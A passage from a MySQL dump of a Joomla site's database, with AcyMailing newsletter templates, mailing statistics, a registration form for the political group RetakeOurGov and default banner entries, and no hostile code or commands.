Geneva, Kalimati, sans-serif;color:#8a8a8a;text-align:center\" width=\"100%\">\r\n\r\n<table width=\"600\" cellpadding=\"0\" cellspacing=\"0\" style=\"text-align:left;margin:auto;\">\r\n    <tr>\r\n    	<td colspan=\"3\" class=\"hideonline\" style=\"font-size:10px;color:#000000;margin:auto;text-align:center;\">This email contains graphics, so if you don\'t see them, {readonline}view it in your browser{/readonline}.</td>\r\n    </tr>\r\n\r\n    <tr>\r\n    	<td colspan=\"3\" height=\"30\"></td>\r\n    </tr>\r\n\r\n    <tr>\r\n\r\n        <td width=\"370\" valign=\"top\">\r\n        	<table cellpadding=\"0\" cellspacing=\"0\">\r\n            	<tr>\r\n                	<td height=\"40\" valign=\"top\">\r\n                    	<h1 style=\"margin-bottom:0;margin-top:0;font-family:Tahoma, Geneva, Kalimati, sans-serif;font-size:26px;color:#d47e7e;vertical-align:top;text-align:center\">AcyMailing is Out!</h1>\r\n                    </td>\r\n\r\n                </tr>\r\n\r\n                <tr>\r\n                	<td>\r\n\r\n                        <h3 style=\"color:#8a8a8a;text-align:right;ont-weight:normal;font-size:100%;margin:0;\">E-Mail</h3>\r\n                        <h6 style=\"background-color:#d39fc9;margin:0;\">&nbsp;</h6>\r\n                        <table>\r\n                            <tr>\r\n                                <td align=\"justify\">\r\n                                <p style=\"font-size:10px;margin-top:0px;\">Electronic mail, often abbreviated as email or e-mail, is a method of exchanging digital messages, designed primarily for human use.<br/><a href=\"http://en.wikipedia.org/wiki/E-mail\">Wikipedia</a></p>\r\n                                </td>\r\n                                <td width=\"30%\" style=\"text-align:center\">\r\n                                    <img src=\"http://www.acyba.com/images/templates/newsletter-1/acymailing.png\" />\r\n                                </td>\r\n                            </tr>\r\n                            <tr>\r\n                                <td colspan=\"2\" align=\"right\">\r\n                                    <a href=\"#\" style=\"font-size:10px;color:#999999;\">Read More</a>\r\n                                </td>\r\n                            </tr>\r\n                         </table>\r\n                    </td>\r\n\r\n                </tr>\r\n                <tr>\r\n                	<td height=\"20\">\r\n                    </td>\r\n                </tr>\r\n                <tr>\r\n                	<td>\r\n                        <h3 style=\"color:#8a8a8a;font-weight:normal;font-size:100%;margin:0;text-align:right\">Marketing Campaign</h3>\r\n                        <h6 style=\"background-color:#d39fc9;margin:0;\">&nbsp;</h6>\r\n                        <table>\r\n                            <tr>\r\n                                <td valign=\"top\" align=\"justify\" width=\"35%\">\r\n                                <p style=\"font-size:10px;margin-top:0px;\">Marketing is an integrated communications-based process through which individuals and communities are informed or persuaded that existing and newly-identified needs and wants may be satisfied by the products and services of others.</p>\r\n                                </td>\r\n                                <td>\r\n                                    <img src=\"components/com_acymailing/templates/newsletter-1/vert-separator.png\" />\r\n                                </td>\r\n                                <td style=\"text-align:center\">\r\n                                    <img src=\"http://www.acyba.com/images/templates/newsletter-1/essential.png\" />\r\n                                </td>\r\n                                <td>\r\n                                    <img src=\"components/com_acymailing/templates/newsletter-1/vert-separator.png\" />\r\n                                </td>\r\n                                <td  valign=\"top\" align=\"justify\" width=\"30%\">\r\n                                    <p style=\"font-size:10px;margin-top:0px;\">Marketing is used to create the customer, to keep the customer and to satisfy the customer.  <a href=\"http://en.wikipedia.org/wiki/Marketing_campaign\">Wikipedia</a></p>\r\n                                </td>\r\n                            </tr>\r\n                            <tr>\r\n                                <td colspan=\"5\" align=\"right\">\r\n                                    <a href=\"#\" style=\"font-size:10px;color:#999999;\">Read More</a>\r\n                                </td>\r\n                            </tr>\r\n\r\n\r\n                         </table>\r\n                    </td>\r\n\r\n                </tr>\r\n            </table>\r\n        </td>\r\n\r\n        <td width=\"20\">\r\n        </td>\r\n\r\n        <td width=\"210\" valign=\"top\">\r\n        	<table cellpadding=\"0\" cellspacing=\"0\">\r\n            	<tr>\r\n                	<td>\r\n                    	<img src=\"http://www.acyba.com/images/templates/newsletter-2/logo-icon.jpg\" width=\"207\" height=\"137\" alt=\"\">\r\n                    </td>\r\n\r\n                </tr>\r\n                <tr>\r\n                	<td>\r\n                        <h3 style=\"color:#8a8a8a;font-weight:normal;font-size:100%;margin:0;\">Joomla!</h3>\r\n                        <h6 style=\"background-color:#d39fc9;margin:0;\">&nbsp;</h6>\r\n                        <table>\r\n                            <tr>\r\n                                <td align=\"justify\">\r\n                                <p style=\"font-size:10px;margin-top:0px;\">Joomla! is a content management system platform for publishing content on the World Wide Web and intranets as well as a Model–view–controller (MVC) Web Application Development framework.</p>\r\n                                </td>\r\n                           </tr>\r\n\r\n                           <tr>\r\n                                <td>\r\n                                <img src=\"components/com_acymailing/templates/newsletter-2/hori-separator.png\" />\r\n                                </td>\r\n                           </tr>\r\n\r\n                           <tr>\r\n                                <td align=\"justify\">\r\n                                    <p style=\"font-size:10px;margin-top:0px;\">The system includes features such as page caching to improve performance, RSS feeds, printable versions of pages, news flashes, blogs, polls, website searching, and language internationalization.<br/><a href=\"http://en.wikipedia.org/wiki/Joomla\">Wikipedia</a></p>\r\n                                </td>\r\n                            </tr>\r\n                            <tr>\r\n                                <td align=\"right\">\r\n                                    <a href=\"#\" style=\"font-size:10px;color:#999999;\">Read More</a>\r\n                                </td>\r\n                            </tr>\r\n                         </table>\r\n                    </td>\r\n\r\n                </tr>\r\n\r\n            </table>\r\n        </td>\r\n\r\n    </tr>\r\n    <tr>\r\n    	<td colspan=\"3\" height=\"30\"></td>\r\n    </tr>\r\n\r\n    <tr>\r\n    	<td colspan=\"3\" class=\"hideonline\" style=\"font-size:10px;color:#000000;margin:auto;text-align:center;\">Not interested any more? {unsubscribe}Unsubscribe{/unsubscribe}</td>\r\n    </tr>\r\n</table>\r\n\r\n\r\n</div>','',NULL,1,0,2,'newsletter-2','a:3:{s:16:\"acymailing_title\";s:63:\"color:#8a8a8a;text-align:right;border-bottom:6px solid #d39fc9;\";s:6:\"tag_h1\";s:63:\"color:#8a8a8a;text-align:right;border-bottom:6px solid #d39fc9;\";s:8:\"color_bg\";s:7:\"#ffffff\";}',NULL,NULL),(3,'Rounders and corners','Template with 2 columns and 3 rounded areas for articles<br/><img src=\"components/com_acymailing/templates/newsletter-3/newsletter-3.png\"/>','<div style=\"background-color:#dfe6e8;font-size:100%;font-family:Tahoma, Geneva, Kalimati, sans-serif;color:#8a8a8a;text-align:center\" width=\"100%\">\r\n\r\n<table width=\"600\" cellpadding=\"0\" cellspacing=\"0\" style=\"text-align:left;margin:auto;\">\r\n    <tr>\r\n    	<td colspan=\"3\" class=\"hideonline\" style=\"font-size:10px;color:#000000;margin:auto;text-align:center;\">This email contains graphics, so if you don\'t see them, {readonline}view it in your browser{/readonline}.</td>\r\n    </tr>\r\n\r\n    <tr>\r\n    	<td colspan=\"3\" height=\"30\"></td>\r\n    </tr>\r\n\r\n    <tr>\r\n\r\n        <td width=\"216\" valign=\"top\">\r\n        	<table cellpadding=\"0\" cellspacing=\"0\">\r\n            	<tr>\r\n                	<td style=\"text-align: center\">\r\n                    	<img src=\"http://www.acyba.com/images/templates/newsletter-3/logo-icon.jpg\" width=\"207\" height=\"137\" alt=\"\">\r\n                    </td>\r\n\r\n                </tr>\r\n\r\n                <tr>\r\n                	<td height=\"20\">\r\n\r\n                    </td>\r\n\r\n                </tr>\r\n\r\n                <tr>\r\n                	<td>\r\n\r\n                            <table cellspacing=\"0\" cellpadding=\"0\">\r\n                                <tr>\r\n                                    <td colspan=\"3\" width=\"216\" height=\"15\">\r\n                                    <img src=\"components/com_acymailing/templates/newsletter-3/top23rds.png\" alt=\"\" />\r\n                                    </td>\r\n                                </tr>\r\n                                <tr>\r\n                                    <td  bgcolor=\"#FFFFFF\" width=\"15\"></td>\r\n                                    <td bgcolor=\"#FFFFFF\" width=\"186\" >\r\n                                        <h3 style=\"color:#8a8a8a;font-weight:normal;font-size:100%;margin:0;\">Joomla!</h3>\r\n                                        <h6 style=\"background-color:#d3d09f;margin:0;\">&nbsp;</h6>\r\n                                        <table>\r\n                                            <tr>\r\n\r\n                                                <td>\r\n                                                <p style=\"font-size:10px;margin-top:0px;\">Joomla! is a content management system platform for publishing content on the World Wide Web and intranets as well as a Model–view–controller (MVC) Web Application Development framework.</p>\r\n                                                <img src=\"components/com_acymailing/templates/newsletter-2/hori-separator.png\" />\r\n                                                <p style=\"font-size:10px;\">The system includes features such as page caching to improve performance, RSS feeds, printable versions of pages, news flashes, blogs, polls, website searching, and language internationalization.<br/><a href=\"http://en.wikipedia.org/wiki/Joomla\">Wikipedia</a></p>\r\n                                                </td>\r\n\r\n                                            </tr>\r\n                                            <tr>\r\n                                                <td align=\"right\">\r\n                                                    <a href=\"#\" style=\"font-size:10px;color:#999999;\">Read More</a>\r\n                                                </td>\r\n                                            </tr>\r\n                                      </table>\r\n\r\n\r\n                                    </td>\r\n                                    <td  bgcolor=\"#FFFFFF\" width=\"15\"></td>\r\n                                </tr>\r\n                                <tr>\r\n                                    <td  colspan=\"3\" width=\"216\" height=\"15\">\r\n                                    <img src=\"components/com_acymailing/templates/newsletter-3/bottom23rds.png\" alt=\"\"/>\r\n                                    </td>\r\n                                </tr>\r\n                            </table>\r\n                    </td>\r\n\r\n                </tr>\r\n\r\n            </table>\r\n        </td>\r\n\r\n\r\n\r\n\r\n        <td width=\"20\">\r\n        </td>\r\n  <td width=\"364\" valign=\"top\">\r\n        	<table cellpadding=\"0\" cellspacing=\"0\">\r\n            	<tr>\r\n                	<td width=\"325\" height=\"48\" style=\"background-color:#ffffff;color:#d47e7e;text-align:center;\">\r\n                        <h1 style=\"margin-bottom:0;margin-top:0;font-family:Tahoma, Geneva, Kalimati, sans-serif;font-size:26px;color:#d47e7e;vertical-align:top;\">AcyMailing is Out!</h1>\r\n                  </td>\r\n\r\n                </tr>\r\n\r\n                <tr>\r\n                	<td height=\"20\">\r\n\r\n                    </td>\r\n                </tr>\r\n\r\n                <tr>\r\n                	<td>\r\n                            <table cellspacing=\"0\" cellpadding=\"0\">\r\n                                <tr>\r\n                                    <td colspan=\"3\" width=\"323\" height=\"15\">\r\n                                    <img src=\"components/com_acymailing/templates/newsletter-3/top23rd.png\" />\r\n                                    </td>\r\n                                </tr>\r\n                                <tr>\r\n                                    <td  bgcolor=\"#FFFFFF\" width=\"15\"></td>\r\n                                    <td bgcolor=\"#FFFFFF\" width=\"293\" >\r\n                                        <h3 style=\"color:#8a8a8a;font-weight:normal;font-size:100%;margin:0;\">E-Mail</h3>\r\n                                        <h6 style=\"background-color:#d3d09f;margin:0;\">&nbsp;</h6>\r\n                                        <table>\r\n                                            <tr>\r\n                                                <td>\r\n                                                    <img src=\"http://www.acyba.com/images/templates/newsletter-1/acymailing.png\" />\r\n                                                </td>\r\n                                                <td>\r\n                                                <p style=\"font-size:10px;margin-top:0px;\">Electronic mail, often abbreviated as email or e-mail, is a method of exchanging digital messages, designed primarily for human use.<br/><a href=\"http://en.wikipedia.org/wiki/E-mail\">Wikipedia</a></p>\r\n                                                </td>\r\n\r\n                                            </tr>\r\n                                            <tr>\r\n                                                <td colspan=\"2\" align=\"right\">\r\n                                                    <a href=\"#\" style=\"font-size:10px;color:#999999;\">Read More</a>\r\n                                                </td>\r\n                                            </tr>\r\n                                         </table>\r\n                                    </td>\r\n                                    <td  bgcolor=\"#FFFFFF\" width=\"15\"></td>\r\n                                </tr>\r\n                                <tr>\r\n                                    <td  colspan=\"3\" width=\"323\" height=\"15\">\r\n                                    <img src=\"components/com_acymailing/templates/newsletter-3/bottom23rd.png\" alt=\"\"/>\r\n                                    </td>\r\n                                </tr>\r\n                            </table>\r\n\r\n                    </td>\r\n\r\n                </tr>\r\n\r\n                <tr>\r\n                	<td height=\"20\">\r\n\r\n                    </td>\r\n                </tr>\r\n\r\n\r\n\r\n                <tr>\r\n                	<td>\r\n                        <table cellspacing=\"0\" cellpadding=\"0\">\r\n                            <tr>\r\n                                <td colspan=\"3\" width=\"323\" height=\"15\">\r\n                                	<img src=\"components/com_acymailing/templates/newsletter-3/top23rd.png\" />\r\n                                </td>\r\n                            </tr>\r\n                            <tr>\r\n                                <td  bgcolor=\"#FFFFFF\" width=\"15\"></td>\r\n                                <td bgcolor=\"#FFFFFF\" width=\"293\" >\r\n                                    <h3 style=\"color:#8a8a8a;font-weight:normal;font-size:100%;margin:0;\">Marketing Campaign</h3>\r\n                                    <h6 style=\"background-color:#d3d09f;margin:0;\">&nbsp;</h6>\r\n                                    <table>\r\n                                        <tr>\r\n\r\n                                            <td>\r\n                                            <p style=\"font-size:10px;margin-top:0px;\">Marketing is an integrated communications-based process through which individuals and communities are informed or persuaded that existing and newly-identified needs and wants may be satisfied by the products and services of others.</p>\r\n                                            <img src=\"components/com_acymailing/templates/newsletter-2/hori-separator.png\" />\r\n                                            <p style=\"font-size:10px;\">Marketing is used to create the customer, to keep the customer and to satisfy the customer.  <a href=\"http://en.wikipedia.org/wiki/Marketing_campaign\">Wikipedia</a></p>\r\n                                            </td>\r\n                                            <td>\r\n                                                <img src=\"http://www.acyba.com/images/templates/newsletter-1/essential.png\" alt=\"\"/>\r\n                                            </td>\r\n\r\n                                        </tr>\r\n                                        <tr>\r\n                                            <td colspan=\"2\" align=\"right\">\r\n                                                <a href=\"#\" style=\"font-size:10px;color:#999999;\">Read More</a>\r\n                                            </td>\r\n                                        </tr>\r\n                                     </table>\r\n\r\n\r\n                                </td>\r\n                                <td  bgcolor=\"#FFFFFF\" width=\"15\"></td>\r\n                            </tr>\r\n                            <tr>\r\n                                <td  colspan=\"3\" width=\"323\" height=\"15\">\r\n                                <img src=\"components/com_acymailing/templates/newsletter-3/bottom23rd.png\" alt=\"\"/>\r\n                                </td>\r\n                            </tr>\r\n                        </table>\r\n                    </td>\r\n\r\n                </tr>\r\n            </table>\r\n        </td>\r\n\r\n\r\n\r\n    </tr>\r\n    <tr>\r\n    	<td colspan=\"3\" height=\"30\"></td>\r\n    </tr>\r\n\r\n    <tr>\r\n    	<td colspan=\"3\" class=\"hideonline\" style=\"font-size:10px;color:#000000;margin:auto;text-align:center;\">Not interested any more? {unsubscribe}Unsubscribe{/unsubscribe}</td>\r\n    </tr>\r\n</table>\r\n\r\n\r\n</div>','',NULL,1,0,3,'newsletter-3','a:3:{s:16:\"acymailing_title\";s:46:\"color:#8a8a8a;border-bottom:6px solid #d3d09f;\";s:6:\"tag_h1\";s:46:\"color:#8a8a8a;border-bottom:6px solid #d3d09f;\";s:8:\"color_bg\";s:7:\"#dfe6e8\";}',NULL,NULL);
/*!40000 ALTER TABLE `jos_acymailing_template` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_url`
--

DROP TABLE IF EXISTS `jos_acymailing_url`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_url` (
  `urlid` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(250) NOT NULL,
  `url` varchar(250) NOT NULL,
  PRIMARY KEY (`urlid`),
  UNIQUE KEY `url` (`url`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_url`
--

LOCK TABLES `jos_acymailing_url` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_url` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_acymailing_url` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_urlclick`
--

DROP TABLE IF EXISTS `jos_acymailing_urlclick`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_urlclick` (
  `urlid` int(10) unsigned NOT NULL,
  `mailid` mediumint(10) unsigned NOT NULL,
  `click` smallint(10) unsigned NOT NULL DEFAULT '0',
  `subid` int(10) unsigned NOT NULL,
  `date` int(10) unsigned NOT NULL,
  PRIMARY KEY (`urlid`,`mailid`,`subid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_urlclick`
--

LOCK TABLES `jos_acymailing_urlclick` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_urlclick` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_acymailing_urlclick` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_userstats`
--

DROP TABLE IF EXISTS `jos_acymailing_userstats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_userstats` (
  `mailid` mediumint(10) unsigned NOT NULL,
  `subid` int(10) unsigned NOT NULL,
  `html` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `sent` tinyint(4) NOT NULL DEFAULT '1',
  `senddate` int(11) NOT NULL,
  `open` tinyint(4) NOT NULL DEFAULT '0',
  `opendate` int(11) NOT NULL,
  `bounce` tinyint(4) NOT NULL DEFAULT '0',
  `fail` tinyint(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`mailid`,`subid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_userstats`
--

LOCK TABLES `jos_acymailing_userstats` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_userstats` DISABLE KEYS */;
INSERT INTO `jos_acymailing_userstats` VALUES (8,1,1,1,1276951812,0,0,0,0),(8,2,1,1,1276951812,3,1276958006,0,0),(10,16,1,1,1277081631,0,0,0,0);
/*!40000 ALTER TABLE `jos_acymailing_userstats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_artforms`
--

DROP TABLE IF EXISTS `jos_artforms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_artforms` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `titel` varchar(255) NOT NULL DEFAULT '',
  `text` text NOT NULL,
  `danktext` text NOT NULL,
  `customjscode` text NOT NULL,
  `customcss` text NOT NULL,
  `metakey` mediumtext NOT NULL,
  `metadesc` text NOT NULL,
  `email` varchar(255) NOT NULL DEFAULT '',
  `ccmail` varchar(255) NOT NULL DEFAULT '',
  `bccmail` varchar(255) NOT NULL DEFAULT '',
  `html` char(2) NOT NULL DEFAULT '0',
  `seccode` char(2) NOT NULL DEFAULT '0',
  `emailfield` char(2) NOT NULL DEFAULT '0',
  `allowatt` varchar(10) NOT NULL DEFAULT '0',
  `allowattfiles` mediumtext NOT NULL,
  `allowattfilesize` int(40) NOT NULL DEFAULT '102400',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `ordering` int(10) unsigned NOT NULL DEFAULT '9999',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `author` varchar(255) NOT NULL DEFAULT '',
  `modifier` varchar(255) NOT NULL DEFAULT '',
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `afeditor` varchar(255) NOT NULL DEFAULT '',
  `attribs` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_artforms`
--

LOCK TABLES `jos_artforms` WRITE;
/*!40000 ALTER TABLE `jos_artforms` DISABLE KEYS */;
INSERT INTO `jos_artforms` VALUES (2,'RetakeOurGov Registration','<p>Thank you for making the decision to join RetakeOurGov.  Please enter all information below.  Then enter the security code to complete the registration process.  After registering you\'ll receive an invitation to join our email list so that you\'ll be kept up to date with our progress in Taking Back America.</p>','<p>Fight back against the career politicians.  Thank you for joining RetakeOurGov, the TEA Party group and Political Action Committee.</p>','','','','','cwiljanen@retakeourgov.com','','wes@retakeourgov.com','0','2','0','0','',0,1,'0000-00-00 00:00:00','0000-00-00 00:00:00',64,63,'2010-06-21 02:47:55',0,0,'0000-00-00 00:00:00','2010-06-15 19:47:48',62,'Donna Nakagiri','Donna Nakagiri',2,42,'','tinymce_light','confirmation_email=membership@retakeourgov.com\nshow_newsletter_system=0\nshow_reset_button=0\nshow_back_button=0\nshow_form_title=1\nchange_page_title=1\nshow_created_date=0\nshow_modif_date=0\nshow_author=0\nuse_custom_css=0\nuse_redirect_url=0\nredirect_url=http://www.retakeourgov.com\nlimit_attachs=\nset_att_manditory=0');
/*!40000 ALTER TABLE `jos_artforms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_artforms_inbox`
--

DROP TABLE IF EXISTS `jos_artforms_inbox`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_artforms_inbox` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `form_id` int(11) NOT NULL DEFAULT '0',
  `item_name` text NOT NULL,
  `item_data` text NOT NULL,
  `form_date` varchar(45) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_artforms_inbox`
--

LOCK TABLES `jos_artforms_inbox` WRITE;
/*!40000 ALTER TABLE `jos_artforms_inbox` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_artforms_inbox` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_artforms_items`
--

DROP TABLE IF EXISTS `jos_artforms_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_artforms_items` (
  `item_id` int(11) NOT NULL AUTO_INCREMENT,
  `form_id` int(11) NOT NULL DEFAULT '0',
  `name` text NOT NULL,
  `type` varchar(10) NOT NULL DEFAULT '',
  `required` char(1) NOT NULL DEFAULT '0',
  `validation` varchar(10) NOT NULL DEFAULT '0',
  `values` text NOT NULL,
  `default_values` text NOT NULL,
  `readonly` char(1) NOT NULL DEFAULT '0',
  `customcode` varchar(255) NOT NULL DEFAULT '',
  `item_ordering` tinyint(5) unsigned NOT NULL DEFAULT '0',
  `layout` text NOT NULL,
  PRIMARY KEY (`item_id`)
) ENGINE=MyISAM AUTO_INCREMENT=17 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_artforms_items`
--

LOCK TABLES `jos_artforms_items` WRITE;
/*!40000 ALTER TABLE `jos_artforms_items` DISABLE KEYS */;
INSERT INTO `jos_artforms_items` VALUES (9,2,'first name','1','1','0','','','0','',0,'<div style=\"margin-left:15px;\">\r\n<div style=\"float:left;margin-top:5px;width:100px;\">###FIELDNAME###</div>\r\n<div style=\"float:left;margin-top:5px;\">###THEFIELD###</div>\r\n<div style=\"float:left;margin-top:5px;\">###ASTERISK###</div>\r\n</div>\r\n<div class=\"clear\"></div>'),(10,2,'last name','1','1','0','','','0','',1,'<div style=\"margin-left:15px;\">\r\n<div style=\"float:left;margin-top:5px;width:100px;\">###FIELDNAME###</div>\r\n<div style=\"float:left;margin-top:5px;\">###THEFIELD###</div>\r\n<div style=\"float:left;margin-top:5px;\">###ASTERISK###</div>\r\n</div>\r\n<div class=\"clear\"></div>'),(11,2,'street address','1','1','0','','','0','',2,'<div style=\"margin-left:15px;\">\r\n<div style=\"float:left;margin-top:5px;width:100px;\">###FIELDNAME###</div>\r\n<div style=\"float:left;margin-top:5px;\">###THEFIELD###</div>\r\n<div style=\"float:left;margin-top:5px;\">###ASTERISK###</div>\r\n</div>\r\n<div class=\"clear\"></div>'),(12,2,'city','1','1','0','','','0','',3,'<div style=\"margin-left:15px;\">\r\n<div style=\"float:left;margin-top:5px;width:100px;\">###FIELDNAME###</div>\r\n<div style=\"float:left;margin-top:5px;\">###THEFIELD###</div>\r\n<div style=\"float:left;margin-top:5px;\">###ASTERISK###</div>\r\n</div>\r\n<div class=\"clear\"></div>'),(13,2,'state','1','1','0','','','0','',4,'<div style=\"margin-left:15px;\">\r\n<div style=\"float:left;margin-top:5px;width:100px;\">###FIELDNAME###</div>\r\n<div style=\"float:left;margin-top:5px;\">###THEFIELD###</div>\r\n<div style=\"float:left;margin-top:5px;\">###ASTERISK###</div>\r\n</div>\r\n<div class=\"clear\"></div>'),(14,2,'zip code','1','1','0','','','0','',5,'<div style=\"margin-left:15px;\">\r\n<div style=\"float:left;margin-top:5px;width:100px;\">###FIELDNAME###</div>\r\n<div style=\"float:left;margin-top:5px;\">###THEFIELD###</div>\r\n<div style=\"float:left;margin-top:5px;\">###ASTERISK###</div>\r\n</div>\r\n<div class=\"clear\"></div>'),(15,2,'phone','1','1','0','','','0','',6,'<div style=\"margin-left:15px;\">\r\n<div style=\"float:left;margin-top:5px;width:100px;\">###FIELDNAME###</div>\r\n<div style=\"float:left;margin-top:5px;\">###THEFIELD###</div>\r\n<div style=\"float:left;margin-top:5px;\">###ASTERISK###</div>\r\n</div>\r\n<div class=\"clear\"></div>'),(16,2,'email','1','1','0','','','0','',7,'<div style=\"margin-left:15px;\">\r\n<div style=\"float:left;margin-top:5px;width:100px;\">###FIELDNAME###</div>\r\n<div style=\"float:left;margin-top:5px;\">###THEFIELD###</div>\r\n<div style=\"float:left;margin-top:5px;\">###ASTERISK###</div>\r\n</div>\r\n<div class=\"clear\"></div>');
/*!40000 ALTER TABLE `jos_artforms_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_banner`
--

DROP TABLE IF EXISTS `jos_banner`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_banner` (
  `bid` int(11) NOT NULL AUTO_INCREMENT,
  `cid` int(11) NOT NULL DEFAULT '0',
  `type` varchar(30) NOT NULL DEFAULT 'banner',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `imptotal` int(11) NOT NULL DEFAULT '0',
  `impmade` int(11) NOT NULL DEFAULT '0',
  `clicks` int(11) NOT NULL DEFAULT '0',
  `imageurl` varchar(100) NOT NULL DEFAULT '',
  `clickurl` varchar(200) NOT NULL DEFAULT '',
  `date` datetime DEFAULT NULL,
  `showBanner` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor` varchar(50) DEFAULT NULL,
  `custombannercode` text,
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `description` text NOT NULL,
  `sticky` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `tags` text NOT NULL,
  `params` text NOT NULL,
  PRIMARY KEY (`bid`),
  KEY `viewbanner` (`showBanner`),
  KEY `idx_banner_catid` (`catid`)
) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_banner`
--

LOCK TABLES `jos_banner` WRITE;
/*!40000 ALTER TABLE `jos_banner` DISABLE KEYS */;
INSERT INTO `jos_banner` VALUES (1,1,'banner','OSM 1','osm-1',0,227,0,'osmbanner1.png','http://www.opensourcematters.org','2004-07-07 15:31:29',0,0,'0000-00-00 00:00:00','','',13,'',0,1,'0000-00-00 00:00:00','0000-00-00 00:00:00','',''),(2,1,'banner','OSM 2','osm-2',0,49,0,'osmbanner2.png','http://www.opensourcematters.org','2004-07-07 15:31:29',0,0,'0000-00-00 00:00:00','','',13,'',0,2,'0000-00-00 00:00:00','0000-00-00 00:00:00','',''),(3,1,'','Joomla!','joomla',0,40,0,'','http://www.joomla.org','2006-05-29 14:21:28',0,0,'0000-00-00 00:00:00','','<a href=\"{CLICKURL}\" target=\"_blank\">{NAME}</a>\r\n<br/>\r\nJoomla! The most popular and widely used Open Source CMS Project in the world.',14,'',0,1,'0000-00-00 00:00:00','0000-00-00 00:00:00','',''),(4,1,'','JoomlaCode','joomlacode',0,40,0,'','http://joomlacode.org','2006-05-29 14:19:26',0,0,'0000-00-00 00:00:00','','<a href=\"{CLICKURL}\" target=\"_blank\">{NAME}</a>\r\n<br/>\r\nJoomlaCode, development and distribution made easy.',14,'',0,2,'0000-00-00 00:00:00','0000-00-00 00:00:00','',''),(5,1,'','Joomla! Extensions','joomla-extensions',0,35,0,'','http://extensions.joomla.org','2006-05-29 14:23:21',0,0,'0000-00-00 00:00:00','','<a href=\"{CLICKURL}\" target=\"_blank\">{NAME}</a>\r\n<br/>\r\nJoomla! Components, Modules, Plugins and Languages by the bucket load.',14,'',0,3,'0000-00-00 00:00:00','0000-00-00 00:00:00','',''),(6,1,'','Joomla! Shop','joomla-shop',0,35,0,'','http://shop.joomla.org','2006-05-29 14:23:21',0,0,'0000-00-00 00:00:00','','<a href=\"{CLICKURL}\" target=\"_blank\">{NAME}</a>\r\n<br/>\r\nFor all your Joomla! merchandise.',14,'',0,4,'0000-00-00 